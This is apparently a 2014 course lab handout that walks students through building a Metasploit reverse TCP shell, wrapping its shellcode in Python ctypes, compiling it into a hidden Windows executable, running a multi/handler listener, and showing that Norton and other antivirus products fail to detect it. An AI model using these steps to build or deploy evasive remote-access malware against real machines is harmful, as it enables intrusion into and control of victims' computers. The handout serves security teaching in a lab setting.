Proj 10: Defeating Norton Antivirus with Python (20 pts. + 30 extra)

What You Need

Purpose

Make a reverse TCP shell exploit with Metasploit, compile it into a Windows executable, and use it to control a Windows target with Norton Antivirus running.

This is a strong demonstration of the weak protection afforded by antivirus.

Networking

Start both your Windows target and your Kali Linux attacker. Make sure you can ping the Kali Linux box from the Windows box. If you want to attack a Windows 7 host running the Kali Linux as a virtual machine, use Bridged networking mode.

Generating Malicious Code with Metasploit

In Kali Linux, in a Terminal, execute this command:

ifconfig
Make a note of your Kali Linux box's IP address.

In Kali Linux, in a Terminal, execute these commands, replacing the IP address with the IP address of your Kali Linux box, and "YOURNAME" with your own name (without spaces).

msfpayload windows/shell/reverse_tcp LHOST=192.168.119.132 C > YOURNAME-rsh.py

nano YOURNAME-rsh.py

The file opens in nano, as shown below.

This code is written in C, not in Python, so some additional lines are needed.

Add this line to the top of the file:

from ctypes import *
That imports the library code needed to run a C program from Python.

Remove all the comment lines. TIP: in nano, Ctrl+K deletes a line.

Remove this line:

unsigned char buf[] =
Add this text to the start of the first line of hexadecimal codes:
stage1code = (
Your screen should now look like this:

In nano, use the down-arrow key to find the end of the first block of green hexadecimal codes, as shown below:

Add a closing parenthesis before the semicolon at the end of the first block of green hexadecimal codes, like this:

Add these lines to the end of the first block of green hexadecimal codes:

memory1 = create_string_buffer(stage1code, len(stage1code))

stage1 = cast(memory1, CFUNCTYPE(c_void_p))

stage1()

Your screen should now look like this:

Below the lines you just added, remove all the comment lines.

Remove this line:

unsigned char buf[] =
Add this text to the start of the first line of hexadecimal codes:
stage2code = (
Your screen should now look like this:

In nano, use the down-arrow key to move to the end of the file.

Add a closing parenthesis before the semicolon at the end of the block of green hexadecimal codes, like this:

Add these lines to the end of the first block of green hexadecimal codes:

memory2 = create_string_buffer(stage2code, len(stage2code))

stage2 = cast(memory2, CFUNCTYPE(c_void_p))

stage2()

Your screen should now look like this:

Save the file with Ctrl+X, Y, Enter.

In Kali Linux, in a Terminal, execute this command to copy the file to your Kali desktop:

cp YOURNAME-rsh.py ~/Desktop

Moving the File to your Windows Machine

In Kali Linux, minimize all windows.

Drag the YOURNAME-rsh.py file from the Kali Linux desktop to the desktop of your host system.

If you are not attacking the host, move the file from the desktop of the host system to your target system.

You could also move the file by emailing it.

Starting a Metasploit Listener

Your Kali machine will serve as the Command & Control server for the Windows bot. Therefore it must be listening for bots to call in, requesting commands.

In Kali Linux, in a Terminal, execute these commands:

msfconsole

use exploit/multi/handler

set PAYLOAD windows/shell/reverse_tcp

set LHOST 0.0.0.0

set ExitOnSession false

exploit -j

The payload handler should start, like this:

Preparing your Windows Python Environment

You need Python 2.7, PyWin32, pip-Win, and pyinstaller on your Windows system, as you set it up in the two previous projects.

Starting pip-Win

On your Windows machine, click Start. In the Search box, type in pip-Win.

When it finds pip-Win1.6.exe, click it.

In pip-Win1.6, in the Command field, enter

venv pyi-env-name
as shown below:


Click Run.

A command shell opens with your Python development environment.

Testing the Malware

On Windows, in the Command Prompt window, execute this command:
python YOURNAME-rsh.py
You should see a "session opened" message on Kali.

In Kali, execute this command to start interaction with the Windows target:

sessions -i 1
On Kali, you should see a banner saying "Microsoft Windows", as shown below:

Troubleshooting

Wrong Path

If python cannot find your YOURNAME-rsh.py file, you are in the wrong working directory. Use the CD command to move to the correct directory, which will be something like this:

CD \Users\Administrator\Desktop

Syntax Errors

If you see Python syntax errors on the Windows machine, there are typographical errors in your Python source code.

Open the YOURNAME-rsh.py file on Windows in Wordpad and correct them.

IP Address Errors

If the Python code runs, but no session is opened on Kali Linux, you may have made malware that connects to the wrong address. Open a new Command Prompt window on Windows and try pinging the Kali Linux machine. If the address is wrong, you will have to repeat the whole process to make new exploit code, because the address is encoded in the hexadecimal values and not simple to fix.

VMware Networking Problems

VMware machines running Kali tend to ignore SYN packets and/or send inappropriate RST packets. A simple way to prevent that is to run Wireshark sniffing.

Open a new Terminal window in Kali and execute this command:

wireshark
Start sniffing on your network adapter.

Try the exploit again.

Metasploit Listener Problems

If the session dies with an ECONNRESET error message in Metasploit, use the exit command to stop Metasploit and start the listener again. Restarting Wireshark may also help.

Capturing a Screen Image

Make sure both desktops are visible, showing the three items listed below. You may need two images to capture it all.

Save the image as "Proj 10a from YOUR NAME".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Stopping the Python Exploit

On Windows, close the Command Prompt window running your YOURNAME-rsh.py program.

Starting pip-Win Again

On your Windows machine, in pip-Win1.6, click Run.

A command shell opens with your Python development environment.

Compling the Malware

On Windows, in the Command Prompt window, execute this command:
pyinstaller --onefile --noconsole YOURNAME-rsh.py
This creates a file named "YOURNAME-rsh.exe" in the "dist" folder on your desktop.

Troubleshooting

If you see an error message saying "Error: PyInstaller for Python 2.6+ on Windows needs pywin32", that means pywin32 did not install correctly.

Reinstall it by executing this command in the black Command Prompt window:

easy_install "C:\Users\Student\Downloads\pywin32-218.win32-py2.7.exe"
You may have to adjust the path to point to the pywin32 file you downloaded.

Running the Malware

On your Windows desktop, double-click the dist folder.

Double-click the YOURNAME-rsh.exe file.

You should see a "session opened" message on Kali.

In Kali, execute this command to start interaction with the Windows target:

sessions -i 2
On Kali, you should see a banner saying "Microsoft Windows", as shown below:

Capturing a Screen Image

Make sure both desktops are visible, showing the two items listed below. You may need two images to capture it all.

Save the image as "Proj 10b from YOUR NAME".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Stopping the Malware

In Windows, right-click the taskbar at the bottom of the desktop and click "Start Task manager". In Task Manager, find the two processes named YOURNAME-rsh.exe, as shown below.

On one of the two YOURNAME-rsh.exe processes, right-click it, click "End Process", and click "End Process" again.

If both "YOURNAME-rsh.exe" processes vanish, you're done. If one is still running, close it the same way.

Adding Norton Antivirus to your Windows Machine

In your Windows machine, open a Browser and go to this URL:

http://goo.gl/BPq4DN

A 30-day trial version of Norton Antivirus downloads.

Install it with the default options.

Update Norton when you are prompted to. Restart your Windows machine if you are prompted to.

When Norton is all updated and running, run its console, so you can see the green "All Threats Resolved" message, as shown below.

Then run the executable again, and establish a remote control session with Kali Linux.

See what Norton does about it. At the time I wrote this, Norton didn't do a thing, as shown below.

Capturing a Screen Image

Make sure both desktops are visible, showing the three items listed below. You may need two images to capture it all.

Save the image as "Proj 10c from YOUR NAME".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Challenges (up to +30 pts.)

Try other antivirus applications! If you can find a free trial version, try the commercial ones like Kasperksy, Nod32, Trend, etc. Free ones are OK too, like AVG, Avira, Avast, Microsoft Security Essentials, etc.

For each AV, turn in a screen shot showing the EXE file running and Kali Linux showing an open session, with the AV panel showing whether it detected the malware. Of course, if the AV detects it, it will probably delete the EXE file and block the session, so capture an image showing that.

Each other AV product you test is worth +10 points, up to a maximum of +30.

Turning in Your Project

Send the images to cnit.124@gmail.com with a subject of "Proj 10 from YOUR NAME".

Sources

I am grateful for assistance from @info_dox, @NortonSupport, and @ViolentPython in developing this project.

Using meterpreter on local machine without an exploit

Violent Python


Last revised: 4-21-14 9:26 pm